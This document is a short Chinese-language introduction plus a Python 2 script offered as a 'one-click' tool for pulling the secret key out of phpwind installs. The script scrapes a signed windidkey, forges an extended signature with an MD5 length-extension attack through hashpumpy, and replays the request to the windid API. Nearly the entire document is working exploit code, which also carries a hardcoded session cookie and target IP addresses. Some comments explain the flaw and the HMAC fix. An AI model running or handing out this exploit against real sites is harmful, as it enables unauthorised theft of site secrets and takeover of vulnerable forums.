利用 md5 length extension attack，具体分析文章：https://www.leavesongs.com/PENETRATION/phpwind-hash-length-extension-attack.html
phpwind获得secretkey一键化脚本,填写一下cookie和url就可以获得secretkey
#coding=utf-8
import urllib
import urllib2
import time
import cookielib
import gzip
import StringIO
from bs4 import BeautifulSoup
import re
import hashpumpy
import sys
# Python 2 only: site.py removes sys.setdefaultencoding at startup, so the
# module is reloaded to get it back, then UTF-8 is forced as the implicit
# str<->unicode codec for the rest of the script. (Does not exist on Python 3.)
reload(sys)
sys.setdefaultencoding('utf-8')
def get_key(url):
    """Fetch the avatar page of the logged-in user and pull the windid
    parameters out of the page's ``<param name="FlashVars">`` value.

    Args:
        url: base URL of the phpwind install without a trailing slash
            (the path '/?m=profile&c=avatar&_left=avatar' is appended verbatim).

    Returns:
        The first ``(uid, windidkey, time, clientid)`` tuple matched in the
        URL-decoded FlashVars string. ``windidkey`` is the server-issued
        signature that ``padding_exten`` later treats as an MD5 hex digest.

    Raises:
        AttributeError: no FlashVars ``<param>`` on the page (``soup.find``
            returns None).
        IndexError: the regex matched nothing.

    Uses the module-level ``opener`` (carrying the session cookie) that is
    built in ``__main__``; calling this before that block runs fails with
    NameError.
    """
    url = url + '/?m=profile&c=avatar&_left=avatar'
    response = opener.open(url)
    html = response.read()
    # Accept-Encoding advertises gzip, and urllib2 does not transparently
    # decompress, so inflate the body by hand when the server compressed it.
    if response.info().get('Content-Encoding') == 'gzip':
        stream = StringIO.StringIO(html)
        with gzip.GzipFile(fileobj=stream) as f:
            html = f.read()
    soup = BeautifulSoup(html, 'lxml')
    key_url = soup.find('param',attrs={'name':'FlashVars'}).get('value')
    # FlashVars is percent-encoded; decode before matching the query string.
    key_url = urllib.unquote(key_url)
    # Non-greedy groups stop at the next '&'; '&type' anchors the end so
    # clientid does not swallow the remaining parameters.
    rule = 'uid=(.+?)&windidkey=(.+?)&time=(.+?)&clientid=(.+?)&type'
    Pattern = re.compile(rule, re.S)
    rs = re.findall(Pattern, key_url)
    return rs[0]
def padding_exten(windidkey,time,uid):
    """Run the MD5 length-extension step and return ``[forged_key, padding]``.

    Args:
        windidkey: hex MD5 digest issued by the server, assumed to be
            ``md5(secret || original_data)`` with a 32-byte secret
            (``key_length = 32`` below; see the linked write-up).
        time: the ``time`` value harvested by ``get_key``.
        uid: the ``uid`` value harvested by ``get_key``.

    Returns:
        A two-element list: ``[new_digest, padding]`` where ``new_digest`` is
        hashpump's extended digest and ``padding`` is the glue padding that sits
        between ``original_data`` and ``data_to_add``, percent-encoded for use
        in a URL.

    Raises:
        IndexError: the ``undefined(.+?)alist`` regex found no padding in the
            stringified hashpump result.

    Why this works at all: a plain ``md5(secret || data)`` signature lets
    anyone append data without knowing the secret. The defensive fix is an
    HMAC (or any keyed construction that is not a bare Merkle-Damgard hash),
    which is not extendable.
    """
    hexdigest = windidkey
    # Presumably the sorted key/value concatenation the server signs for the
    # avatar upload (a=doAvatar, c=avatar, m=api, type=flash, uid=..); verify
    # against the write-up before changing it.
    original_data = time+'adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined'
    # Extension target: a=list, c=app, m=api, i.e. the POST body sent in
    # __main__ (data = {'m':'api','c':'app','a':'list'}).
    data_to_add = 'alistcappmapi'
    key_length = 32
    result = list()
    # hashpump(hexdigest, original_data, data_to_add, key_length) returns
    # (new_digest, new_message) with new_message =
    # original_data + glue padding + data_to_add.
    rs = hashpumpy.hashpump(hexdigest,original_data,data_to_add,key_length)
    result.append(rs[0])
    # NOTE(review): the padding is recovered by parsing repr() of the tuple,
    # which is fragile: it assumes Python 2 str repr, that neither element
    # contains ',' or a single quote, and that every non-printable byte shows
    # up as \xNN. repr escapes such as \t, \n or \\ are left untouched and
    # would end up literally in the URL. Slicing rs[1] by len(original_data)
    # would avoid all of this.
    tmp = str(rs)
    tmp = tmp.split(',')[1]
    tmp = tmp.split("\'")[1]
    # Turn repr escapes (\x80, \x00, ...) into percent-encoding (%80, %00).
    tmp = tmp.replace('\\x','%')
    # The glue padding is exactly the bytes between the end of original_data
    # ('...undefined') and the start of data_to_add ('alist...').
    rule = 'undefined(.+?)alist'
    Pattern = re.compile(rule, re.S)
    tmp = re.findall(Pattern, tmp)
    result.append(tmp[0])
    return result
if __name__ == '__main__':
    # Target base URL and an authenticated phpwind session; both are meant to
    # be filled in by the operator (see the header text). The cookie literal
    # below is a leftover from one specific session, not a reusable value.
    url = 'http://192.168.0.100/phpwind'
    cookie = 'CNZZDATA1257835621=169451052-1472798292-null%7C1472798292; PHPSESSID=5adaadb063b4208acd574d3d044dda38; ECS[visit_times]=5; csrf_token=ab686222777d7f80; xzr_winduser=PbUcCS1OT1ZjCzY8GoJOV8EOvix9OdGpc%2BmWBPYV6ar07B7AZSOhSw%3D%3D; xzr_lastvisit=7%091475751418%09%2Fphpwind%2F%3Fm%3Dprofile%26c%3Davatar%26_left%3Davatar; xzr_visitor=cx59FPbNJ4FYG2e9cWKpUP%2FTZTef7Yu4DTFLTftwwZ%2FPEVo8'
    # A cookie jar is installed, but the session is really carried by the
    # static 'Cookie' header appended below; get_key() reaches this opener as
    # a module-level global.
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    opener.addheaders.append(
        ('User-Agent', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0'))
    opener.addheaders.append(('Accept', '*/*'))
    opener.addheaders.append(('Accept-Language', 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3'))
    # gzip is advertised here, which is why both response paths below
    # decompress by hand.
    opener.addheaders.append(('Accept-Encoding', 'gzip, deflate'))
    opener.addheaders.append(('Connection', 'keep-alive'))
    opener.addheaders.append(('Cookie', cookie))
    # NOTE(review): Host and Referer name 106.75.33.217:5888 while url names
    # 192.168.0.100; they look stale and have to be updated together with url
    # or the server may route/reject the request.
    opener.addheaders.append(('Host', '106.75.33.217:5888'))
    opener.addheaders.append(('Referer', 'http://106.75.33.217:5888/rob.php?id=740'))
    opener.addheaders.append(('Cache-Control', 'max-age=0'))
    # Step 1: harvest the server-signed windidkey and its inputs.
    # This rebinds the name `time`, shadowing the module imported above;
    # nothing after this line uses the time module, so it is harmless here.
    uid, windidkey, time, clientid = get_key(url)
    # Step 2: extend the signature so it also covers 'alistcappmapi'.
    windidkey, padding = padding_exten(windidkey,time,uid)
    # Step 3: replay against windid with the forged key. The percent-encoded
    # glue padding is carried as the value of a parameter whose name is the
    # signed string, presumably so the server's own parameter concatenation
    # reproduces the extended message (see the linked write-up).
    # Defender's note: on the server side these requests stand out as
    # /windid/index.php queries whose parameter names embed %80/%00 bytes;
    # the real fix is to sign with an HMAC instead of md5(secret || data).
    payload = '/windid/index.php?time='+time+'&windidkey='+windidkey+'&clientid='+clientid+'&adoAvatarcavatarmapitypeflashuid'+uid+'uidundefined='+padding
    url = url + payload
    # POST body matching data_to_add in padding_exten (a=list, c=app, m=api).
    data = {'m':'api','c':'app','a':'list'}
    data = urllib.urlencode(data)
    response = opener.open(url,data)
    html = response.read()
    if response.info().get('Content-Encoding') == 'gzip':
        stream = StringIO.StringIO(html)
        with gzip.GzipFile(fileobj=stream) as f:
            html = f.read()
    # Python 2 print statement; dumps the raw API response, which per the
    # header text contains the secret key on a vulnerable install.
    print html